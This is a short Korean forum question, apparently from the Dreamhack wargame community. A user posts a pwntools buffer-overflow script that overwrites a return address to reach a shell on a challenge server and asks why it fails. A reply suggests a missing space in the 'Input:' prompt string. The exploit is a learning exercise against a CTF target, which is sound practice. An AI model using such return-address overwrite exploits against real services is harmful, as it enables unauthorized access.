안되는 이유
from pwn import *
p = remote('host3.dreamhack.games',18210)
payload = b'A'*0x30 + b'B'*0x8 + p64(0x4006aa)
p.sendlineafter('Input:',payload)
p.interactive()
이유를 모르겠습니다...
#pwnable
작성자 정보
답변
1
wyv3rn
무플 방지 위원회장
input: 다음에 스페이스 하나 빠진 것 같네요.